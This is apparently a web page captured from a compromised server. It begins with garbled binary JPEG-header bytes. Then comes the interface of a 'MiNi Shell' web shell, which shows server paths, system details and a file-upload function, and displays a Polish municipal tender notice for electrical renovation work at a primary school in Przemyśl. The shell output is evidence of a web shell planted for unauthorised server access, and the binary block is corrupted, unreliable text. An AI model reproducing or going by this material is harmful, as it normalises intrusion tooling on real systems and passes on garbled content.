JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210622/0009005801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00090058 z dnia 2021-06-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEBUDOWA INSTALACJI ELEKTRYCZNEJ W SZKOLE PODSTAWOWEJ NR. 5<br/>PRZY UL. KONARSKIEGO 7 W PRZEMYŚLU – I ETAP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Przemyśl</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900341</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@um.przemysl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przemysl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEBUDOWA INSTALACJI ELEKTRYCZNEJ W SZKOLE PODSTAWOWEJ NR. 5<br/>PRZY UL. KONARSKIEGO 7 W PRZEMYŚLU – I ETAP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a49c9e9-d32c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00090058</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002188/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa instalacji elektrycznych w Szkole Podstawowej nr 5 przy ul. St. Konarskiego 7 w Przemyślu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu platformy zakupowej, która dostępna jest pod adresem internetowym:<br/>https://platformazakupowa.pl/pn/przemysl.<br/>2. Zapytania, wnioski i inne informacje (z wyłączeniem oferty i dokumentów składanych wraz z nią)<br/>Wykonawcy przekazują za pośrednictwem funkcji „Wyślij wiadomość” dostępnej na stronie<br/>dedykowanej przedmiotowemu postępowaniu.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia z Biuletynu Zamówień Publicznych, pod którym zostało<br/>zamieszczone ogłoszenie o zamówieniu dotyczące niniejszego postępowania -<br/>https://platformazakupowa.pl/pn/przemysl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>Platformy zakupowej opisane zostały w Regulaminie korzystania z Platformy (adres:<br/>https://platformazakupowa.pl/strona/1-regulamin).<br/>2. Jeśli Wykonawca będzie chciał założyć konto Użytkownika na Platformie wówczas konieczne jest<br/>posiadanie przez Użytkownika aktywnego konta poczty elektronicznej (e-mail). Adres e-mail wskazany<br/>w Formularzu Oferty powinien być tożsamy z adresem używanym przez Wykonawcę/Użytkownika do<br/>obsługi jego konta na Platformie. Po zarejestrowaniu się na Platformie Wykonawca będzie miał dostęp<br/>do Instrukcji dla Wykonawców również pod adresem https://platformazakupowa.pl/strona/45-instrukcje.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy to 150 MB, dopuszczalna<br/>ilość plików to 10.<br/>4. Korzystanie z Platformy odbywać się może wyłącznie na zasadach i w zakresie wskazanym w<br/>Regulaminie. Minimalne wymagania techniczne umożliwiające korzystanie ze strony<br/>www.platformazakupowa.pl to: przeglądarka internetowa Internet Explorer, Chrome i FireFox w<br/>najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies”<br/>oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli.<br/>5. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na<br/>Platformę zakupową.<br/>6. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa<br/>Rady Ministrów z 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>7. Składanie ofert przez www.platformazakupowa.pl jest dla Wykonawców całkowicie bezpłatne.<br/>8. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych: .pdf,<br/>.doc, .docx, .rtf, .xps, .odt i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym.<br/>9. Zamawiający jednocześnie informuje, że posiadanie konta na Platformie jest dobrowolne, a złożenie<br/>oferty w przetargu jest możliwe bez posiadania konta.<br/>10. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania<br/>Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>11. Każdy załączany plik zawierający dokumenty, oświadczenia lub pełnomocnictwa musi być<br/>uprzednio podpisany podpisami kwalifikowanymi, podpisami osobistymi lub podpisami zaufanymi przez<br/>upoważnione osoby reprezentujące odpowiednio wykonawcę, podmioty wspólnie ubiegające się o<br/>udzielenie zamówienia, podmiot trzeci, na którego zasoby Wykonawca się powołuje lub<br/>podwykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa instalacji elektrycznej w Szkole Podstawowej Nr 5<br/>w Przemyślu przy ul. Konarskiego 7, na terenie działki nr 1044 obręb 207 – I etap.<br/>2. Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) został przedstawiony w nw. dokumentach<br/>stanowiących Załącznik Nr 5 do SWZ:<br/>1) Projekt Wykonawczy instalacje elektryczne– etap I; <br/>2) Inwentaryzacja + projekt robót towarzyszących (wymiana drzwi, rozbiórka boazerii, roboty malarskie) zestawienie stolarki drzwiowej.<br/>3) Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych I etap –<br/>roboty elektryczne;<br/>a) zakres robót dotyczy wykonania instalacji objętych zakresem robót 1 etapu w pomieszczenia<br/>nr 2/1, 2/2, 2/3, 2/4, 2/5, 2/6, 2/7, 2/8, 2/9, 2/10, 2/11, 2/12, 2/13, 2/14, 2/15, KS/1, KS/2,<br/>b) demontaż istniejącej instalacji elektrycznych,<br/>c) montaż instalacji:<br/>- siły,<br/>- oświetlenia ogólnego i gniazd wtykowych ogólnych,<br/>- instalacje gniazd data,<br/>- instalacja oświetlenia awaryjnego i ewakuacyjnego,<br/>- dodatkowa ochrona od porażeń,<br/>d) Przebudowa rozdzielni TGsz parter,<br/>e) montaż rozdzielni R-10 parter,<br/>f) montaż rozdzielni R-21 1 piętro,<br/>g) WLZ relacji TGsz – R10,<br/>h) WLZ relacji R10 – R21,<br/>i) Rurarz relacji R10 – R31;<br/>4) Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót – roboty budowlane;<br/>a) wymiana stolarki drzwiowej na drewnianą sosnową na I piętrze zgodnie z zestawieniem<br/>stolarki,<br/>b) demontaż boazerii na korytarzu I piętra,<br/>c) roboty malarskie na korytarzu I piętra,<br/>5) Przedmiar robót elektrycznych;<br/>6) Przedmiar robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45311200-2 - Roboty w zakresie instalacji elektrycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny.<br/>2.	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3.	Za najkorzystniejszą zostanie uznana oferta z najniższą ceną brutto.<br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5.	W toku badania i oceny ofert Zamawiający będzie mógł żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>6.	Zamawiający wybierze najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>7.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8.	W przypadku braku zgody, o której mowa w ust. 7, oferta będzie podlegała odrzuceniu, a Zamawiający zwróci się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji zapewniającej należyte wykonanie<br/>zamówienia, jeżeli wykaże, że podczas realizacji przedmiotu zamówienia będzie dysponował<br/>minimum 1 osobą posiadającą uprawnienia, wymagane przepisami ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane (tekst jednolity: Dz.U. z 2020r. poz. 1333 z późn. zm.) do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych do pełnienia funkcji kierownika robót elektrycznych lub<br/>ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów o<br/>ile zakres uprawnień obejmuje zakres wymagany do realizacji przedmiotu zamówienia, należącą<br/>do właściwej Izby samorządu zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający, przed udzieleniem zamówienia, na podst. art. 274 ust. 1<br/>ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnego na dzień złożenia wykazu<br/>osób skierowanych przez Wykonawcę do realizacji zamówienia uwzględniającego minimum 1 osobę<br/>posiadającą uprawnienia, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst<br/>jednolity: Dz.U. z 2020r. poz. 1333 z późn. zm.) do kierowania robotami budowlanymi bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych do pełnienia funkcji kierownika robót elektrycznych;<br/>2. Z treści dokumentów i oświadczeń musi wynikać jednoznacznie, iż postawione przez<br/>Zamawiającego warunki i wymagania zostały spełnione.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W niniejszym postępowaniu zamawiający wymaga wniesienia wadium w wysokości 3.000,00<br/>zł.<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Przedłużenie terminu związania ofertą będzie dopuszczalne tylko z jednoczesnym<br/>przedłużeniem okresu ważności wadium albo jeżeli nie będzie to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity:<br/>Dz.U. z 2020 r. poz. 299).<br/>5. Wadium wniesione w formach, o których mowa w ust. 4 pkt 2-4 niniejszego Rozdziału musi<br/>nieodwołalnie i bezwarunkowo zobowiązywać poręczyciela lub gwaranta do zapłaty kwoty<br/>pieniężnej na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.<br/>6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>bankowy, którego posiadaczem jest Zamawiający:<br/>Getin Noble Bank - Nr rachunku: 86 1560 0013 2787 7120 6000 0154<br/>z dopiskiem w tytule płatności<br/>“Wadium w postępowaniu o sygnaturze: ZP.271.6.2021”<br/>a dowód wniesienia wadium należy dołączyć do oferty. Za skuteczne wniesienie wadium w<br/>pieniądzu Zamawiający uzna wadium, które w wyznaczonym terminie znajdzie się na rachunku<br/>bankowym Zamawiającego.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4 pkt<br/>2-4 niniejszego Rozdziału, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej.<br/>8. Gwarancja lub poręczenie musi zabezpieczać wypłatę wadium w następujących<br/>okolicznościach:<br/>1) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128<br/>ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków<br/>dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o<br/>których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 125<br/>ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie<br/>omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości<br/>wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/>2) jeżeli wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie Wykonawcy, którego oferta została wybrana.<br/>9. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>10. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwróci wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Każdy załączany plik zawierający dokumenty, oświadczenia lub pełnomocnictwa musi być<br/>uprzednio podpisany podpisami kwalifikowanymi, podpisami osobistymi lub podpisami zaufanymi<br/>przez upoważnione osoby reprezentujące odpowiednio wykonawcę, podmioty wspólnie<br/>ubiegające się o udzielenie zamówienia, podmiot trzeci, na którego zasoby Wykonawca się<br/>powołuje lub podwykonawców.<br/>2. Do oferty należy dołączyć:<br/>1) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnieniu<br/>warunków udziału w postępowaniu – wzór 